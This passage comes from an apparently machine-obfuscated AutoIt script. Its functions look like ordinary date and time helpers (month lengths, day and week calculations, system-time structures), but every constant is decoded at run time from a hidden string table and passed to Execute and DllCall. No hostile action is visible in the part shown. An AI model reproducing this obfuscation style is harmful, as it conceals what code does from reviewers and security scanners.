  4968.     $a4c37114838 = StringFormat($a60d9c14429, $a4c37114838)
  4969.     $a4069e1164d = StringFormat($a00d9d14e45, $a4069e1164d)
  4970.     $a4b69f11d1e = StringFormat($a44d9e14c19, $a4b69f11d1e)
  4971.     Return $a4c37114838 & $a45d9f13f11 & $a4069e1164d & $a5ce901532d & $a4b69f11d1e
  4972. EndFunc
  4973.  
  4974. Func a5e01704836($a4c37114838, $a4069e1164d, $a4b69f11d1e)
  4975.     If NOT IsDeclared("SSA5E01704836") Then
  4976.         Global $a26e9213a49 = a2b00005424($os[4461]), $a16e9313f49 = a2b00005424($os[4462]), $a02e9411949 = a2b00005424($os[4463]), $a5fe961572f = a2b00005424($os[4464]), $a49e9912830 = a2b00005424($os[4465]), $a09e9a12925 = a2b00005424($os[4466]), $a3ee9b14d4e = a2b00005424($os[4467])
  4977.         Global $ssa5e01704836 = 1
  4978.     EndIf
  4979.     Local $a41e9110303 = StringFormat($a26e9213a49, $a4c37114838, $a4069e1164d, $a4b69f11d1e)
  4980.     If NOT a3cf0800a58($a41e9110303) Then
  4981.         Return SetError(Number($a16e9313f49), Number($a02e9411949), "")
  4982.     EndIf
  4983.     Local $a31e9512662 = Number($a5fe961572f)
  4984.     Local $a50e971585e = a631140382e($a4c37114838)
  4985.     For $a3ce9813338 = Number($a49e9912830) To $a4069e1164d - Number($a09e9a12925)
  4986.         $a31e9512662 = $a31e9512662 + $a50e971585e[$a3ce9813338]
  4987.     Next
  4988.     $a31e9512662 = ($a4c37114838 * Number($a3ee9b14d4e)) + ($a31e9512662 + $a4b69f11d1e)
  4989.     Return $a31e9512662
  4990. EndFunc
  4991.  
  4992. Func a1b01802860($a31e9512662, $a05e9c1422f = "/")
  4993.     If NOT IsDeclared("SSA1B01802860") Then
  4994.         Global $a38e9d1374d = a2b00005424($os[4468]), $a2ae9f15e0e = a2b00005424($os[4469]), $a02f911550f = a2b00005424($os[4470]), $a5ff921182a = a2b00005424($os[4471]), $a52f931004d = a2b00005424($os[4472]), $a4ff9410b3b = a2b00005424($os[4473]), $a08f951055f = a2b00005424($os[4474]), $a3df961065e = a2b00005424($os[4475]), $a32f9715c47 = a2b00005424($os[4476])
  4995.         Global $ssa1b01802860 = 1
  4996.     EndIf
  4997.     Local $a4c37114838 = Int($a31e9512662 / Number($a38e9d1374d))
  4998.     Local $a3de9e14827 = Mod($a31e9512662, Number($a2ae9f15e0e))
  4999.     Local $a43f901314b = Number($a02f911550f)
  5000.     If a3ff0601750($a4c37114838) Then $a43f901314b = Number($a5ff921182a)
  5001.     If $a3de9e14827 > $a43f901314b Then
  5002.         Return SetError(Number($a52f931004d), Number($a4ff9410b3b), "")
  5003.     EndIf
  5004.     Local $a50e971585e = a631140382e($a4c37114838)
  5005.     Local $a4069e1164d = Number($a08f951055f)
  5006.     While $a3de9e14827 > $a50e971585e[$a4069e1164d]
  5007.         $a3de9e14827 = $a3de9e14827 - $a50e971585e[$a4069e1164d]
  5008.         $a4069e1164d = $a4069e1164d + Number($a3df961065e)
  5009.     WEnd
  5010.     Return StringFormat($a32f9715c47, $a4c37114838, $a05e9c1422f, $a4069e1164d, $a05e9c1422f, $a3de9e14827)
  5011. EndFunc
  5012.  
  5013. Func a1501904511()
  5014.     If NOT IsDeclared("SSA1501904511") Then
  5015.         Global $a1ef9814e17 = a2b00005424($os[4477]), $a53f9915243 = a2b00005424($os[4478]), $a4df9a11656 = a2b00005424($os[4479]), $a51f9b15155 = a2b00005424($os[4480]), $a60f9c11a5c = a2b00005424($os[4481]), $a63f9d10a16 = a2b00005424($os[4482]), $a30f9e11956 = a2b00005424($os[4483]), $a4bf9f15c07 = a2b00005424($os[4484]), $a010a012937 = a2b00005424($os[4485]), $a1f0a115000 = a2b00005424($os[4486]), $a590a215953 = a2b00005424($os[4487]), $a400a311658 = a2b00005424($os[4488])
  5016.         Global $ssa1501904511 = 1
  5017.     EndIf
  5018.     Return (a3501001038(Execute($a1ef9814e17) & $a53f9915243 & Execute($a4df9a11656) & $a51f9b15155 & Execute($a60f9c11a5c) & $a63f9d10a16 & Execute($a30f9e11956) & $a4bf9f15c07 & Execute($a010a012937) & $a1f0a115000 & Execute($a590a215953), Number($a400a311658)))
  5019. EndFunc
  5020.  
  5021. Func a4f01a05e23()
  5022.     If NOT IsDeclared("SSA4F01A05E23") Then
  5023.         Global $a0a0a41365b = a2b00005424($os[4489]), $a250a51453f = a2b00005424($os[4490]), $a4b0a612a47 = a2b00005424($os[4491]), $a040a712641 = a2b00005424($os[4492]), $a5b0a811402 = a2b00005424($os[4493]), $a600a912921 = a2b00005424($os[4494]), $a110aa14f2e = a2b00005424($os[4495]), $a260ab12231 = a2b00005424($os[4496]), $a2c0ac11139 = a2b00005424($os[4497]), $a230ad10802 = a2b00005424($os[4498]), $a110ae11c61 = a2b00005424($os[4499])
  5024.         Global $ssa4f01a05e23 = 1
  5025.     EndIf
  5026.     Return (Execute($a0a0a41365b) & $a250a51453f & Execute($a4b0a612a47) & $a040a712641 & Execute($a5b0a811402) & $a600a912921 & Execute($a110aa14f2e) & $a260ab12231 & Execute($a2c0ac11139) & $a230ad10802 & Execute($a110ae11c61))
  5027. EndFunc
  5028.  
  5029. Func a1401b01010()
  5030.     If NOT IsDeclared("SSA1401B01010") Then
  5031.         Global $a620af11812 = a2b00005424($os[4500]), $a0b1a014b0d = a2b00005424($os[4501]), $a051a11590a = a2b00005424($os[4502]), $a551a214c29 = a2b00005424($os[4503]), $a4e1a311629 = a2b00005424($os[4504])
  5032.         Global $ssa1401b01010 = 1
  5033.     EndIf
  5034.     Return (Execute($a620af11812) & $a0b1a014b0d & Execute($a051a11590a) & $a551a214c29 & Execute($a4e1a311629))
  5035. EndFunc
  5036.  
  5037. Func a4e01c03e32()
  5038.     If NOT IsDeclared("SSA4E01C03E32") Then
  5039.         Global $a011a414d26 = a2b00005424($os[4505]), $a041a513f4d = a2b00005424($os[4506]), $a381a612756 = a2b00005424($os[4507]), $a321a713f26 = a2b00005424($os[4508]), $a2d1a81545b = a2b00005424($os[4509]), $a4c1a914f63 = a2b00005424($os[4510])
  5040.         Global $ssa4e01c03e32 = 1
  5041.     EndIf
  5042.     Return (a3501001038(Execute($a011a414d26) & $a041a513f4d & Execute($a381a612756) & $a321a713f26 & Execute($a2d1a81545b), Number($a4c1a914f63)))
  5043. EndFunc
  5044.  
  5045. Func a3301d0504d($a4896d15e31 = 3)
  5046.     If NOT IsDeclared("SSA3301D0504D") Then
  5047.         Global $a3b1aa10844 = a2b00005424($os[4511]), $a061ab14e59 = a2b00005424($os[4512]), $a4c1ac11a16 = a2b00005424($os[4513]), $a4b1ad13302 = a2b00005424($os[4514]), $a4a1ae13907 = a2b00005424($os[4515]), $a461af12708 = a2b00005424($os[4516]), $a542a014939 = a2b00005424($os[4517]), $a272a11133f = a2b00005424($os[4518]), $a132a214911 = a2b00005424($os[4519]), $a1b2a314025 = a2b00005424($os[4520]), $a4c2a41255e = a2b00005424($os[4521]), $a172a512e5a = a2b00005424($os[4522]), $a342a615a30 = a2b00005424($os[4523]), $a412a71353a = a2b00005424($os[4524])
  5048.         Global $ssa3301d0504d = 1
  5049.     EndIf
  5050.     If $a4896d15e31 < Number($a3b1aa10844) OR $a4896d15e31 > Number($a061ab14e59) Then $a4896d15e31 = Number($a4c1ac11a16)
  5051.     Return (a3501001038(Execute($a4b1ad13302) & $a4a1ae13907 & Execute($a461af12708) & $a542a014939 & Execute($a272a11133f) & $a132a214911 & Execute($a1b2a314025) & $a4c2a41255e & Execute($a172a512e5a) & $a342a615a30 & Execute($a412a71353a), $a4896d15e31))
  5052. EndFunc
  5053.  
  5054. Func a0401e03956($a4b69f11d1e, $a4069e1164d = 0, $a4c37114838 = 0)
  5055.     If NOT IsDeclared("SSA0401E03956") Then
  5056.         Global $a0c2a814029 = a2b00005424($os[4525]), $a1e2a913d27 = a2b00005424($os[4526]), $a0e2aa10251 = a2b00005424($os[4527]), $a062ab11608 = a2b00005424($os[4528]), $a102ac1260d = a2b00005424($os[4529]), $a5e2ad12e3e = a2b00005424($os[4530]), $a062ae14401 = a2b00005424($os[4531]), $a5a3a014039 = a2b00005424($os[4532]), $a293a114c4e = a2b00005424($os[4533]), $a193a210359 = a2b00005424($os[4534]), $a5d3a316130 = a2b00005424($os[4535]), $a2e3a412837 = a2b00005424($os[4536]), $a543a511147 = a2b00005424($os[4537]), $a0a3a615521 = a2b00005424($os[4538]), $a4e3a714a27 = a2b00005424($os[4539]), $a1c3a815a08 = a2b00005424($os[4540]), $a393a916153 = a2b00005424($os[4541]), $a093ab14235 = a2b00005424($os[4542])
  5057.         Global $ssa0401e03956 = 1
  5058.     EndIf
  5059.     If $a4c37114838 = Number($a0c2a814029) Then $a4c37114838 = Execute($a1e2a913d27)
  5060.     If $a4069e1164d = Number($a0e2aa10251) Then $a4069e1164d = Execute($a062ab11608)
  5061.     If NOT a3cf0800a58($a4c37114838 & $a102ac1260d & $a4069e1164d & $a5e2ad12e3e & $a4b69f11d1e) Then Return Number($a062ae14401)
  5062.     Local $a3f2af1105a = DllStructCreate($a3538605c61)
  5063.     DllCall($a5a3a014039, $a293a114c4e, $a193a210359, $a5d3a316130, $a3f2af1105a)
  5064.     If @error Then Return SetError(@error, @extended, Number($a2e3a412837))
  5065.     DllStructSetData($a3f2af1105a, Number($a543a511147), $a4b69f11d1e)
  5066.     If $a4069e1164d > Number($a0a3a615521) Then DllStructSetData($a3f2af1105a, Number($a4e3a714a27), $a4069e1164d)
  5067.     If $a4c37114838 > Number($a1c3a815a08) Then DllStructSetData($a3f2af1105a, Number($a393a916153), $a4c37114838)
  5068.     Local $a373aa11e13 = a5921f03c42($a3f2af1105a)
  5069.     If @error Then Return SetError(@error, @extended, Number($a093ab14235))
  5070.     Return Int($a373aa11e13)
  5071. EndFunc
  5072.  
  5073. Func a3b01f05e1d($a4e3ac10705, $a193ad1413c, $a263ae10815 = 0)
  5074.     If NOT IsDeclared("SSA3B01F05E1D") Then
  5075.         Global $a203af10c57 = a2b00005424($os[4543]), $a3e4a011e19 = a2b00005424($os[4544]), $a504a114300 = a2b00005424($os[4545]), $a284a21481b = a2b00005424($os[4546]), $a0b4a31502f = a2b00005424($os[4547]), $a1d4a412a4f = a2b00005424($os[4548]), $a154a51201a = a2b00005424($os[4549]), $a274a612909 = a2b00005424($os[4550]), $a434a713a43 = a2b00005424($os[4551]), $a214a81212e = a2b00005424($os[4552]), $a1c4a914302 = a2b00005424($os[4553]), $a594aa1573a = a2b00005424($os[4554]), $a0d4ab11c54 = a2b00005424($os[4555]), $a174ac1222d = a2b00005424($os[4556]), $a074ad10858 = a2b00005424($os[4557]), $a2f4ae1325e = a2b00005424($os[4558]), $a554af15532 = a2b00005424($os[4559]), $a5e5a01002c = a2b00005424($os[4560]), $a4f5a112c0e = a2b00005424($os[4561])
  5076.         Global $ssa3b01f05e1d = 1
  5077.     EndIf
  5078.     If $a4e3ac10705 < Number($a203af10c57) OR $a4e3ac10705 > Number($a3e4a011e19) Then Return Number($a504a114300)
  5079.     If $a193ad1413c < Number($a284a21481b) OR $a193ad1413c > Number($a0b4a31502f) Then Return Number($a1d4a412a4f)
  5080.     If $a263ae10815 < Number($a154a51201a) OR $a263ae10815 > Number($a274a612909) Then Return Number($a434a713a43)
  5081.     Local $a3f2af1105a = DllStructCreate($a3538605c61)
  5082.     DllCall($a214a81212e, $a1c4a914302, $a594aa1573a, $a0d4ab11c54, $a3f2af1105a)
  5083.     If @error Then Return SetError(@error, @extended, Number($a174ac1222d))
  5084.     DllStructSetData($a3f2af1105a, Number($a074ad10858), $a4e3ac10705)
  5085.     DllStructSetData($a3f2af1105a, Number($a2f4ae1325e), $a193ad1413c)
  5086.     If $a263ae10815 > Number($a554af15532) Then DllStructSetData($a3f2af1105a, Number($a5e5a01002c), $a263ae10815)
  5087.     Local $a373aa11e13 = a5921f03c42($a3f2af1105a)
  5088.     If @error Then Return SetError(@error, @extended, Number($a4f5a112c0e))
  5089.     Return Int($a373aa11e13)
  5090. EndFunc
  5091.  
  5092. Func a3a1100102f($a515a212d49, ByRef $a385a31505f, ByRef $a105a41221b, ByRef $a445a51444d)
  5093.     If NOT IsDeclared("SSA3A1100102F") Then
  5094.         Global $a085a61102e = a2b00005424($os[4562]), $a0d5a714847 = a2b00005424($os[4563]), $a005a81465b = a2b00005424($os[4564]), $a0a5a912c15 = a2b00005424($os[4565]), $a395aa12127 = a2b00005424($os[4566]), $a265ab10d5d = a2b00005424($os[4567]), $a275ac1492b = a2b00005424($os[4568]), $a285ad15155 = a2b00005424($os[4569]), $a4b5ae1463d = a2b00005424($os[4570]), $a4b5af13f38 = a2b00005424($os[4571]), $a226a014c40 = a2b00005424($os[4572]), $a046a110410 = a2b00005424($os[4573]), $a3d6a212546 = a2b00005424($os[4574]), $a0d6a316239 = a2b00005424($os[4575]), $a006a41624e = a2b00005424($os[4576]), $a626a516202 = a2b00005424($os[4577])
  5095.         Global $ssa3a1100102f = 1
  5096.     EndIf
  5097.     If Number($a515a212d49) > Number($a085a61102e) Then
  5098.         $a515a212d49 = Int($a515a212d49 / Number($a0d5a714847))
  5099.         $a385a31505f = Int($a515a212d49 / Number($a005a81465b))
  5100.         $a515a212d49 = Mod($a515a212d49, Number($a0a5a912c15))
  5101.         $a105a41221b = Int($a515a212d49 / Number($a395aa12127))
  5102.         $a445a51444d = Mod($a515a212d49, Number($a265ab10d5d))
  5103.         Return Number($a275ac1492b)
  5104.     ElseIf Number($a515a212d49) = Number($a285ad15155) Then
  5105.         $a385a31505f = Number($a4b5ae1463d)
  5106.         $a515a212d49 = Number($a4b5af13f38)
  5107.         $a105a41221b = Number($a226a014c40)
  5108.         $a445a51444d = Number($a046a110410)
  5109.         Return Number($a3d6a212546)
  5110.     Else
  5111.         Return SetError(Number($a0d6a316239), Number($a006a41624e), Number($a626a516202))
  5112.     EndIf
  5113. EndFunc
  5114.  
  5115. Func a4211102e3f($a385a31505f = @HOUR, $a105a41221b = @MIN, $a445a51444d = @SEC)
  5116.     If NOT IsDeclared("SSA4211102E3F") Then
  5117.         Global $a0e6a610520 = a2b00005424($os[4578]), $a0c6a71291e = a2b00005424($os[4579]), $a156a812623 = a2b00005424($os[4580]), $a076a915423 = a2b00005424($os[4581]), $a386aa12d55 = a2b00005424($os[4582]), $a1b6ab13c02 = a2b00005424($os[4583])
  5118.         Global $ssa4211102e3f = 1
  5119.     EndIf
  5120.     If StringIsInt($a385a31505f) AND StringIsInt($a105a41221b) AND StringIsInt($a445a51444d) Then
  5121.         Local $a515a212d49 = Number($a0e6a610520) * ((Number($a0c6a71291e) * $a385a31505f) + (Number($a156a812623) * $a105a41221b) + $a445a51444d)
  5122.         Return $a515a212d49
  5123.     Else
  5124.         Return SetError(Number($a076a915423), Number($a386aa12d55), Number($a1b6ab13c02))
  5125.     EndIf
  5126. EndFunc
  5127.  
  5128. Func a5411205347($a4c37114838 = @YEAR, $a4069e1164d = @MON, $a4b69f11d1e = @MDAY)
  5129.     If NOT IsDeclared("SSA5411205347") Then
  5130.         Global $a486ac13c43 = a2b00005424($os[4584]), $a636ad11617 = a2b00005424($os[4585]), $a606ae14914 = a2b00005424($os[4586]), $a006af1430d = a2b00005424($os[4587]), $a627a010b47 = a2b00005424($os[4588]), $a497a112010 = a2b00005424($os[4589]), $a1a7a213020 = a2b00005424($os[4590]), $a2a7a310431 = a2b00005424($os[4591]), $a517a413605 = a2b00005424($os[4592]), $a5e7a512b0b = a2b00005424($os[4593]), $a457a616034 = a2b00005424($os[4594]), $a2f7a716353 = a2b00005424($os[4595]), $a027a812b50 = a2b00005424($os[4596]), $a447a912837 = a2b00005424($os[4597]), $a257aa12a59 = a2b00005424($os[4598]), $a427ab15d58 = a2b00005424($os[4599]), $a127ad13440 = a2b00005424($os[4600]), $a217ae15159 = a2b00005424($os[4601]), $a107af14260 = a2b00005424($os[4602]), $a118a01312a = a2b00005424($os[4603]), $a058a113432 = a2b00005424($os[4604]), $a408a215803 = a2b00005424($os[4605]), $a468a313d1c = a2b00005424($os[4606]), $a5e8a414e4e = a2b00005424($os[4607]), $a3d8a513438 = a2b00005424($os[4608]), $a028a610b4e = a2b00005424($os[4609]), $a5c8a712439 = a2b00005424($os[4610]), $a5a8a811548 = a2b00005424($os[4611]), $a3f8a910814 = a2b00005424($os[4612]), $a068aa1395d = a2b00005424($os[4613]), $a2f8ab14012 = a2b00005424($os[4614]), $a2e8ac1003b = a2b00005424($os[4615]), $a228ad13d4b = a2b00005424($os[4616]), $a5c8ae15e5f = a2b00005424($os[4617]), $a218af11755 = a2b00005424($os[4618]), $a0c9a015945 = a2b00005424($os[4619]), $a539a11144f = a2b00005424($os[4620]), $a349a210405 = a2b00005424($os[4621]), $a009a313033 = a2b00005424($os[4622]), $a599a413e1e = a2b00005424($os[4623]), $a5a9a514749 = a2b00005424($os[4624]), $a0e9a611f3a = a2b00005424($os[4625]), $a589a713f3a = a2b00005424($os[4626]), $a5a9a813611 = a2b00005424($os[4627]), $a1e9a912f21 = a2b00005424($os[4628]), $a119aa1111f = a2b00005424($os[4629]), $a209ab16107 = a2b00005424($os[4630]), $a529ac12931 = a2b00005424($os[4631]), $a259ad13f03 = a2b00005424($os[4632]), $a519ae12a56 = a2b00005424($os[4633]), $a4d9af13738 = a2b00005424($os[4634]), $a61aa01621b = a2b00005424($os[4635])
  5131.         Global $a2caa11045a = a2b00005424($os[4636]), $a1faa214a1e = a2b00005424($os[4637]), $a58aa310621 = a2b00005424($os[4638]), $a12aa41072a = a2b00005424($os[4639])
  5132.         Global $ssa5411205347 = 1
  5133.     EndIf
  5134.     If $a4b69f11d1e > Number($a486ac13c43) OR $a4b69f11d1e < Number($a636ad11617) Then
  5135.         Return SetError(Number($a606ae14914), Number($a006af1430d), -Number($a627a010b47))
  5136.     ElseIf $a4069e1164d > Number($a497a112010) OR $a4069e1164d < Number($a1a7a213020) Then
  5137.         Return SetError(Number($a2a7a310431), Number($a517a413605), -Number($a5e7a512b0b))
  5138.     ElseIf $a4c37114838 < Number($a457a616034) OR $a4c37114838 > Number($a2f7a716353) Then
  5139.         Return SetError(Number($a027a812b50), Number($a447a912837), -Number($a257aa12a59))
  5140.     EndIf
  5141.     Local $a5889313c42 = a2701302939($a4c37114838, $a4069e1164d, $a4b69f11d1e) - Number($a427ab15d58)
  5142.     Local $a2d7ac1140c = a2701302939($a4c37114838, Number($a127ad13440), Number($a217ae15159)) - Number($a107af14260)
  5143.     If ($a4069e1164d = Number($a118a01312a) AND Number($a058a113432) < $a2d7ac1140c AND $a2d7ac1140c < Number($a408a215803) - ($a4b69f11d1e - Number($a468a313d1c))) Then
  5144.         $a5889313c42 = $a2d7ac1140c - Number($a5e8a414e4e)
  5145.         $a2d7ac1140c = a2701302939($a4c37114838 - Number($a3d8a513438), Number($a028a610b4e), Number($a5c8a712439)) - Number($a5a8a811548)
  5146.         $a4069e1164d = Number($a3f8a910814)
  5147.         $a4b69f11d1e = Number($a068aa1395d)
  5148.         $a4c37114838 = $a4c37114838 - Number($a2f8ab14012)
  5149.     ElseIf ($a4069e1164d = Number($a2e8ac1003b) AND Number($a228ad13d4b) - ($a4b69f11d1e - Number($a5c8ae15e5f)) < a2701302939($a4c37114838 + Number($a218af11755), Number($a0c9a015945), Number($a539a11144f)) - Number($a349a210405) AND a2701302939($a4c37114838 + Number($a009a313033), Number($a599a413e1e), Number($a5a9a514749)) - Number($a0e9a611f3a) < Number($a589a713f3a)) Then
  5150.         Return Number($a5a9a813611)
  5151.     EndIf
  5152.     Return Int((a2701302939($a4c37114838, Number($a1e9a912f21), Number($a119aa1111f)) - Number($a209ab16107) < Number($a529ac12931)) + Number($a259ad13f03) * ($a4069e1164d - Number($a519ae12a56)) + (Number($a4d9af13738) * ($a4069e1164d - Number($a61aa01621b)) + ($a4b69f11d1e - Number($a2caa11045a)) + $a2d7ac1140c - $a5889313c42 + Number($a1faa214a1e)) * Number($a58aa310621) / Number($a12aa41072a))
  5153. EndFunc
  5154.  
  5155. Func a2711304c16($a4c37114838 = @YEAR, $a4069e1164d = @MON, $a4b69f11d1e = @MDAY, $a43aa510b15 = 1)
  5156.     If NOT IsDeclared("SSA2711304C16") Then
  5157.         Global $a58aa61315b = a2b00005424($os[4640]), $a03aa713827 = a2b00005424($os[4641]), $a2aaa815c40 = a2b00005424($os[4642]), $a1faa910e59 = a2b00005424($os[4643]), $a27aaa15e36 = a2b00005424($os[4644]), $a0faab1374b = a2b00005424($os[4645]), $a07aac12052 = a2b00005424($os[4646]), $a19aad11939 = a2b00005424($os[4647]), $a35aae12b17 = a2b00005424($os[4648]), $a0baaf1025f = a2b00005424($os[4649]), $a1aba012d1c = a2b00005424($os[4650]), $a46ba110542 = a2b00005424($os[4651]), $a07ba213355 = a2b00005424($os[4652]), $a32ba312d05 = a2b00005424($os[4653]), $a63ba415d49 = a2b00005424($os[4654]), $a3cba511802 = a2b00005424($os[4655]), $a61ba611110 = a2b00005424($os[4656]), $a3dba714c1e = a2b00005424($os[4657]), $a59ba814e18 = a2b00005424($os[4658]), $a2aba913406 = a2b00005424($os[4659]), $a51bac1285c = a2b00005424($os[4660]), $a10bad15313 = a2b00005424($os[4661]), $a2bbaf1231a = a2b00005424($os[4662]), $a22ca015a57 = a2b00005424($os[4663]), $a56ca113256 = a2b00005424($os[4664]), $a5dca214c25 = a2b00005424($os[4665]), $a3aca315a19 = a2b00005424($os[4666]), $a42ca415963 = a2b00005424($os[4667]), $a3eca51340b = a2b00005424($os[4668]), $a43ca613361 = a2b00005424($os[4669]), $a0bca715d5d = a2b00005424($os[4670]), $a46ca813b43 = a2b00005424($os[4671]), $a29cab1545c = a2b00005424($os[4672]), $a3fcac1592a = a2b00005424($os[4673]), $a4acae10503 = a2b00005424($os[4674]), $a5fcaf1234e = a2b00005424($os[4675]), $a14da014651 = a2b00005424($os[4676]), $a33da11455a = a2b00005424($os[4677]), $a60da210b45 = a2b00005424($os[4678]), $a0bda312730 = a2b00005424($os[4679]), $a08da413551 = a2b00005424($os[4680]), $a32da510329 = a2b00005424($os[4681]), $a37da612443 = a2b00005424($os[4682]), $a1bda81613d = a2b00005424($os[4683]), $a21da914a5b = a2b00005424($os[4684]), $a1fdaa1124e = a2b00005424($os[4685]), $a39dac1062b = a2b00005424($os[4686]), $a24dad12927 = a2b00005424($os[4687]), $a1bdaf13b00 = a2b00005424($os[4688]), $a5eea014924 = a2b00005424($os[4689]), $a22ea11490e = a2b00005424($os[4690]), $a27ea211242 = a2b00005424($os[4691])
  5158.         Global $a4fea31372a = a2b00005424($os[4692]), $a38ea410d1f = a2b00005424($os[4693]), $a04ea512841 = a2b00005424($os[4694]), $a20ea616013 = a2b00005424($os[4695])
  5159.         Global $ssa2711304c16 = 1
  5160.     EndIf
  5161.     If $a4b69f11d1e > Number($a58aa61315b) OR $a4b69f11d1e < Number($a03aa713827) Then
  5162.         Return SetError(Number($a2aaa815c40), Number($a1faa910e59), -Number($a27aaa15e36))
  5163.     ElseIf $a4069e1164d > Number($a0faab1374b) OR $a4069e1164d < Number($a07aac12052) Then
  5164.         Return SetError(Number($a19aad11939), Number($a35aae12b17), -Number($a0baaf1025f))
  5165.     ElseIf $a4c37114838 < Number($a1aba012d1c) OR $a4c37114838 > Number($a46ba110542) Then
  5166.         Return SetError(Number($a07ba213355), Number($a32ba312d05), -Number($a63ba415d49))
  5167.     ElseIf $a43aa510b15 < Number($a3cba511802) OR $a43aa510b15 > Number($a61ba611110) Then
  5168.         Return SetError(Number($a3dba714c1e), Number($a59ba814e18), -Number($a2aba913406))
  5169.     EndIf
  5170.     Local $a62baa15027, $a2ebab15545
  5171.     Local $a2d7ac1140c = a2701302939($a4c37114838, Number($a51bac1285c), Number($a10bad15313))
  5172.     Local $a57bae15b09 = $a4c37114838 & $a2bbaf1231a & $a4069e1164d & $a22ca015a57 & $a4b69f11d1e
  5173.     If $a43aa510b15 = Number($a56ca113256) Then
  5174.         If $a2d7ac1140c = Number($a5dca214c25) Then
  5175.             $a62baa15027 = Number($a3aca315a19)
  5176.         Else
  5177.             $a62baa15027 = -Number($a42ca415963) * $a2d7ac1140c - Number($a3eca51340b)
  5178.         EndIf
  5179.         $a2ebab15545 = $a62baa15027 + Number($a43ca613361)
  5180.     Else
  5181.         $a62baa15027 = $a2d7ac1140c * -Number($a0bca715d5d)
  5182.         $a2ebab15545 = $a62baa15027 + Number($a46ca813b43)
  5183.     EndIf
  5184.     Local $a18ca91352f
  5185.     Local $a4fcaa13958 = a59f020394e($a29cab1545c, $a2ebab15545, $a4c37114838 & $a3fcac1592a)
  5186.     Local $a2ecad1401f = a2701302939($a4c37114838 + Number($a4acae10503), Number($a5fcaf1234e), Number($a14da014651))
  5187.     If $a43aa510b15 = Number($a33da11455a) Then
  5188.         If $a2ecad1401f = Number($a60da210b45) Then
  5189.             $a18ca91352f = Number($a0bda312730)
  5190.         Else
  5191.             $a18ca91352f = -Number($a08da413551) * $a2ecad1401f - Number($a32da510329)
  5192.         EndIf
  5193.     Else
  5194.         $a18ca91352f = $a2ecad1401f * -Number($a37da612443)
  5195.     EndIf
  5196.     Local $a4dda712424 = a59f020394e($a1bda81613d, $a18ca91352f, $a4c37114838 + Number($a21da914a5b) & $a1fdaa1124e)
  5197.     Local $a04dab11659 = a1ff050331d($a39dac1062b, $a4fcaa13958, $a57bae15b09) - Number($a24dad12927)
  5198.     Local $a44dae1481c = a1ff050331d($a1bdaf13b00, $a4dda712424, $a57bae15b09)
  5199.     If $a04dab11659 >= Number($a5eea014924) AND $a44dae1481c < Number($a22ea11490e) Then Return Number($a27ea211242) + Int($a04dab11659 / Number($a4fea31372a))
  5200.     If $a04dab11659 < Number($a38ea410d1f) OR $a44dae1481c >= Number($a04ea512841) Then Return Number($a20ea616013)
  5201. EndFunc
  5202.  
  5203. Func a631140382e($a4c37114838)
  5204.     If NOT IsDeclared("SSA631140382E") Then
  5205.         Global $a0bea81542d = a2b00005424($os[4696]), $a47ea910510 = a2b00005424($os[4697]), $a2deaa15456 = a2b00005424($os[4698]), $a5beab12309 = a2b00005424($os[4699]), $a18eac12160 = a2b00005424($os[4700]), $a51ead15735 = a2b00005424($os[4701]), $a3ceae1315c = a2b00005424($os[4702]), $a41eaf13d53 = a2b00005424($os[4703]), $a14fa01515c = a2b00005424($os[4704]), $a3cfa114940 = a2b00005424($os[4705]), $a40fa21161b = a2b00005424($os[4706]), $a3dfa313f1f = a2b00005424($os[4707]), $a38fa411b40 = a2b00005424($os[4708]), $a26fa514b58 = a2b00005424($os[4709]), $a24fa614c60 = a2b00005424($os[4710]), $a2afa71380d = a2b00005424($os[4711])
  5206.         Global $ssa631140382e = 1
  5207.     EndIf
  5208.     Local $a2dea71560b[Number($a0bea81542d)] = [Number($a47ea910510), Number($a2deaa15456), Number($a5beab12309), Number($a18eac12160), Number($a51ead15735), Number($a3ceae1315c), Number($a41eaf13d53), Number($a14fa01515c), Number($a3cfa114940), Number($a40fa21161b), Number($a3dfa313f1f), Number($a38fa411b40), Number($a26fa514b58)]
  5209.     If a3ff0601750($a4c37114838) Then $a2dea71560b[Number($a24fa614c60)] = Number($a2afa71380d)
  5210.     Return $a2dea71560b
  5211. EndFunc
  5212.  
  5213. Func a2111501e2e($a1dfa811711)
  5214.     If NOT IsDeclared("SSA2111501E2E") Then
  5215.         Global $a62fab14641 = a2b00005424($os[4712]), $a1efac12031 = a2b00005424($os[4713]), $a32fad15907 = a2b00005424($os[4714]), $a63fae13c1a = a2b00005424($os[4715]), $a47faf16017 = a2b00005424($os[4716]), $a0e0b011a0a = a2b00005424($os[4717]), $a120b111344 = a2b00005424($os[4718]), $a4f0b212d0f = a2b00005424($os[4719]), $a0d0b315721 = a2b00005424($os[4720]), $a280b415a2b = a2b00005424($os[4721]), $a500b512706 = a2b00005424($os[4722]), $a340b615059 = a2b00005424($os[4723]), $a590b712855 = a2b00005424($os[4724]), $a0b0b815208 = a2b00005424($os[4725]), $a410b91460d = a2b00005424($os[4726]), $a460ba13d24 = a2b00005424($os[4727])
  5216.         Global $ssa2111501e2e = 1
  5217.     EndIf
  5218.     Local $a50fa912e5d = DllStructCreate($a3538605c61, $a1dfa811711)
  5219.     Local $a22faa12632 = DllStructCreate($a3538605c61)
  5220.     DllStructSetData($a22faa12632, $a62fab14641, DllStructGetData($a50fa912e5d, $a1efac12031))
  5221.     DllStructSetData($a22faa12632, $a32fad15907, DllStructGetData($a50fa912e5d, $a63fae13c1a))
  5222.     DllStructSetData($a22faa12632, $a47faf16017, DllStructGetData($a50fa912e5d, $a0e0b011a0a))
  5223.     DllStructSetData($a22faa12632, $a120b111344, DllStructGetData($a50fa912e5d, $a4f0b212d0f))
  5224.     DllStructSetData($a22faa12632, $a0d0b315721, DllStructGetData($a50fa912e5d, $a280b415a2b))
  5225.     DllStructSetData($a22faa12632, $a500b512706, DllStructGetData($a50fa912e5d, $a340b615059))
  5226.     DllStructSetData($a22faa12632, $a590b712855, DllStructGetData($a50fa912e5d, $a0b0b815208))
  5227.     DllStructSetData($a22faa12632, $a410b91460d, DllStructGetData($a50fa912e5d, $a460ba13d24))
  5228.     Return $a22faa12632
  5229. EndFunc
  5230.  
  5231. Func a4311603047($a3a0bb1194d, $a3d0bc1170a)
  5232.     If NOT IsDeclared("SSA4311603047") Then
  5233.         Global $a020bd10d22 = a2b00005424($os[4728]), $a1d0be15f47 = a2b00005424($os[4729]), $a610bf15432 = a2b00005424($os[4730]), $a0f1b01285c = a2b00005424($os[4731]), $a5a1b111d40 = a2b00005424($os[4732]), $a411b213e22 = a2b00005424($os[4733]), $a091b312961 = a2b00005424($os[4734])
  5234.         Global $ssa4311603047 = 1
  5235.     EndIf
